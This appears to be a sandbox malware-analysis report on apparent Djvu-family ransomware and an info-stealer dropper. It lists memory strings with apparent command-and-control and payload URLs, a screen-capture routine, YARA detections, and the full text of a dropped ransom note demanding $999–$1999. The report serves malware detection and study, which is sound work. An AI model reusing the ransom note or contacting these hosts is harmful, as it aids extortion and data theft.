          Source: build2.exe, 0000000F.00000003.1357167044.00000000007F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4ebc22477a828
          Source: build2.exe, 0000000F.00000003.1352170130.000000000078B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2489003715.0000000000777000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabu
          Source: E0tabE4K4r.exe, 00000006.00000003.1537390130.00000000035A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
          Source: E0tabE4K4r.exe, 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000007.00000002.1281381535.0000000002280000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 0000000D.00000002.2485636228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000010.00000002.1396247343.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000011.00000002.1406738224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000013.00000002.1480789200.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000014.00000002.1490001313.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
          Source: E0tabE4K4r.exe, 0000000D.00000003.1531943324.0000000003570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
          Source: E0tabE4K4r.exe, 00000006.00000003.1532050970.00000000035A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
          Source: E0tabE4K4r.exe, 0000000D.00000003.1532075667.0000000003570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.live.com/
          Source: E0tabE4K4r.exe, 00000006.00000003.1532113102.00000000035A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.nytimes.com/
          Source: E0tabE4K4r.exe, 00000014.00000002.1490001313.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
          Source: E0tabE4K4r.exe, 0000000D.00000003.1532150706.0000000003570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/
          Source: build2.exe, 0000000F.00000002.2493598451.0000000003871000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2497141191.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
          Source: E0tabE4K4r.exe, 00000006.00000003.1532178298.00000000035A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
          Source: E0tabE4K4r.exe, 0000000D.00000003.1532230832.0000000003570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
          Source: E0tabE4K4r.exe, 00000006.00000003.1532235190.00000000035A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
          Source: E0tabE4K4r.exe, 0000000D.00000002.2488321167.00000000006CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$run
          Source: E0tabE4K4r.exe, 00000006.00000002.1932298483.000000000075A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$runl
          Source: E0tabE4K4r.exe, 00000006.00000002.1933355848.00000000030B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe0
          Source: E0tabE4K4r.exe, 00000006.00000002.1933355848.00000000030B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exeL
          Source: E0tabE4K4r.exe, 00000006.00000002.1932442705.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000002.1932442705.0000000000768000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1931541132.0000000000767000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1931541132.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 0000000D.00000002.2488321167.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test1/get.php
          Source: E0tabE4K4r.exe, 0000000D.00000002.2488321167.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F
          Source: E0tabE4K4r.exe, 00000006.00000002.1932442705.00000000007A3000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1931541132.00000000007A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F&first=true
          Source: E0tabE4K4r.exe, 00000006.00000002.1932442705.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1931541132.00000000007BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F&first=trueb
          Source: E0tabE4K4r.exe, 0000000D.00000002.2488321167.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9F_g
          Source: E0tabE4K4r.exe, 0000000D.00000002.2488321167.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test1/get.php?pid=66D42E25994376BE8BE2305BB7A42A9Fwf
          Source: E0tabE4K4r.exe, 0000000D.00000002.2488321167.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test1/get.phpMh
          Source: build2.exe, 0000000F.00000003.1352170130.000000000078B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2490683848.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.2438413125.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.1426795482.00000000007A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15/
          Source: build2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15/ramData
          Source: build2.exe, 0000000F.00000002.2485318072.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220
          Source: build2.exe, 0000000F.00000003.2438055206.00000000007CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/
          Source: build2.exe, 0000000F.00000003.1426795482.00000000007CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/(;
          Source: build2.exe, 0000000F.00000003.1352170130.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/)-
          Source: build2.exe, 0000000F.00000002.2490837398.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.2438055206.00000000007CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/5
          Source: build2.exe, 0000000F.00000003.2438055206.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2490837398.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/F
          Source: build2.exe, 0000000F.00000003.1352170130.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/Q
          Source: build2.exe, 0000000F.00000003.2438055206.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2490837398.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/f
          Source: build2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/freebl3.dll
          Source: build2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/freebl3.dllO
          Source: build2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/freebl3.dllftware
          Source: build2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/mozglue.dll
          Source: build2.exe, 0000000F.00000002.2490837398.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.2438055206.00000000007CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/mozglue.dllBrowser
          Source: build2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/mozglue.dllEdge
          Source: build2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/mozglue.dllftware
          Source: build2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/msvcp140.dll
          Source: build2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/msvcp140.dlldge
          Source: build2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/ng
          Source: build2.exe, 0000000F.00000002.2489003715.0000000000777000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/nss3.dll
          Source: build2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/nss3.dllft
          Source: build2.exe, 0000000F.00000002.2490837398.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.2438055206.00000000007CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/otti
          Source: build2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2490683848.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.2438413125.00000000007A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/softokn3.dll
          Source: build2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/softokn3.dlldge
          Source: build2.exe, 0000000F.00000002.2485318072.0000000000499000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2490837398.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.1426795482.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.2438055206.00000000007CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/sqlite3.dll
          Source: build2.exe, 0000000F.00000003.1426795482.00000000007CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/stemCache
          Source: build2.exe, 0000000F.00000003.2438055206.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2490837398.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/v
          Source: build2.exe, 0000000F.00000003.2438413125.00000000007A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/vcruntime140.dll
          Source: build2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2485318072.00000000004DD000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/vcruntime140.dllUser
          Source: build2.exe, 0000000F.00000002.2490683848.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.2438413125.00000000007A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/vcruntime140.dllc&
          Source: build2.exe, 0000000F.00000002.2485318072.00000000004DD000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/vcruntime140.dllser
          Source: build2.exe, 0000000F.00000003.1352170130.000000000078B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2490683848.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.2438413125.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.1426795482.00000000007A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220/y-
          Source: build2.exe, 0000000F.00000002.2485318072.0000000000576000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220461c2le
          Source: build2.exe, 0000000F.00000002.2485318072.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220461c2nt-Disposition:
          Source: build2.exe, 0000000F.00000002.2485318072.0000000000576000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220461c2osoft
          Source: build2.exe, 0000000F.00000002.2485318072.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220ing
          Source: build2.exe, 0000000F.00000002.2485318072.0000000000576000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220inux
          Source: build2.exe, 0000000F.00000002.2485318072.00000000004DD000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2485318072.000000000044C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.114.15:10220l
          Source: build2.exe, 0000000F.00000003.1462956939.00000000032DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: E0tabE4K4r.exe, 00000006.00000003.1534989233.00000000035A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
          Source: E0tabE4K4r.exe, 00000002.00000002.1251028778.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000002.00000003.1247643664.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000002.00000003.1246963846.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000002.1932298483.000000000075A000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 0000000D.00000002.2488321167.0000000000659000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000011.00000002.1407064334.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000014.00000002.1490227871.0000000000809000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
          Source: E0tabE4K4r.exe, 00000011.00000002.1407064334.00000000007C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/4
          Source: E0tabE4K4r.exe, 0000000D.00000002.2488321167.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/R
          Source: E0tabE4K4r.exe, 00000011.00000003.1404962377.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000013.00000002.1480789200.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000014.00000002.1490227871.0000000000809000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000014.00000002.1490001313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000014.00000002.1490227871.00000000007C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
          Source: E0tabE4K4r.exe, 00000006.00000002.1932298483.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json=
          Source: E0tabE4K4r.exe, 00000014.00000002.1490227871.00000000007C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonI
          Source: E0tabE4K4r.exe, 00000014.00000002.1490227871.0000000000809000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonQ
          Source: E0tabE4K4r.exe, 00000014.00000002.1490227871.00000000007C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonTn
          Source: E0tabE4K4r.exe, 0000000D.00000002.2488321167.0000000000659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonXV
          Source: E0tabE4K4r.exe, 00000011.00000002.1407064334.0000000000788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonk/
          Source: E0tabE4K4r.exe, 0000000D.00000002.2488321167.0000000000618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonl
          Source: E0tabE4K4r.exe, 00000011.00000002.1407064334.0000000000788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonrZ
          Source: E0tabE4K4r.exe, 00000014.00000002.1490227871.00000000007C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsons
          Source: E0tabE4K4r.exe, 00000011.00000002.1407064334.0000000000788000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsons.
          Source: E0tabE4K4r.exe, 00000014.00000002.1490227871.00000000007C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsont
          Source: E0tabE4K4r.exe, 00000014.00000002.1490227871.00000000007C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonto
          Source: E0tabE4K4r.exe, 00000006.00000003.1540856867.00000000035A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/privacy-sdx.win32.bundle.js.map/e3b0c4429
          Source: E0tabE4K4r.exe, 00000006.00000003.1534989233.00000000035A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
          Source: E0tabE4K4r.exe, 00000006.00000003.1534989233.00000000035A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
          Source: E0tabE4K4r.exe, 00000006.00000003.1534989233.00000000035A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
          Source: build2.exe, 0000000F.00000003.1462956939.00000000032DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: build2.exe, 0000000F.00000003.1462956939.00000000032DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: build2.exe, 0000000F.00000003.1462956939.00000000032DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: E0tabE4K4r.exe, 00000006.00000003.1541265236.00000000035A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/generate_204
          Source: build2.exe, 0000000F.00000003.1462956939.00000000032DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: build2.exe, 0000000F.00000003.1462956939.00000000032DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: build2.exe, 0000000F.00000003.1462956939.00000000032DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: E0tabE4K4r.exe, 00000006.00000003.1541265236.00000000035A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/react-native-community/react-native-netinfo
          Source: E0tabE4K4r.exe, 00000006.00000003.1537390130.00000000035A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mrodevicemgr.officeapps.live.com/mrodevicemgrsvc/api
          Source: build2.exe, 0000000E.00000002.1337250782.0000000000800000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2485318072.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199601319247
          Source: build2.exe, 0000000E.00000002.1337250782.0000000000800000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2485318072.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199601319247helloWFQY12O5J6Nr.$v
          Source: build2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
          Source: build2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2485318072.000000000044C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000F.00000003.1347686272.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/bg3goty
          Source: build2.exe, 0000000E.00000002.1337250782.0000000000800000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 0000000F.00000002.2485318072.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/bg3gotymedvsMozilla/5.0
          Source: build2.exe, 0000000F.00000002.2489003715.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/j
          Source: E0tabE4K4r.exe, 00000006.00000002.1933355848.00000000030CA000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 0000000D.00000002.2488321167.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-99MNqXMr
          Source: E0tabE4K4r.exe, 0000000D.00000002.2488321167.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-99MNqXMrF
          Source: E0tabE4K4r.exe, 00000006.00000002.1933355848.00000000030D7000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000002.1933355848.00000000030CA000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1930812818.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 0000000D.00000002.2488321167.00000000006A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-99MNqXMrdS
          Source: build2.exe, 0000000F.00000003.1347492349.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
          Source: build2.exe, 0000000F.00000003.1462956939.00000000032DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: build2.exe, 0000000F.00000003.1462956939.00000000032DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.11:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.11:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.11:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.11:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.11:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.11:49739 version: TLS 1.2
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,2_2_004822E0
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crlJump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crlJump to dropped file

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Found ransom note / readme
          Source: C:\Users\user\AppData\Local\VirtualStore\_readme.txtDropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.You can get and look video overview decrypt tool:https://we.tl/t-99MNqXMrdSPrice of private key and decrypt software is $1999.Discount 50% available if you contact us first 72 hours, that's price for you is $999.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0840ASdwmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1Jump to dropped file
          Yara detected Babuk Ransomware
          Source: Yara matchFile source: Process Memory Space: E0tabE4K4r.exe PID: 6744, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: E0tabE4K4r.exe PID: 7304, type: MEMORYSTR
          Yara detected Djvu Ransomware
          Source: Yara matchFile source: 16.2.E0tabE4K4r.exe.22d15a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.E0tabE4K4r.exe.22d15a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.E0tabE4K4r.exe.22815a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.E0tabE4K4r.exe.22315a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.E0tabE4K4r.exe.22315a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.E0tabE4K4r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.E0tabE4K4r.exe.22715a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.2.E0tabE4K4r.exe.22c15a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.E0tabE4K4r.exe.400000.0.unpack, type: UNPACKEDPE
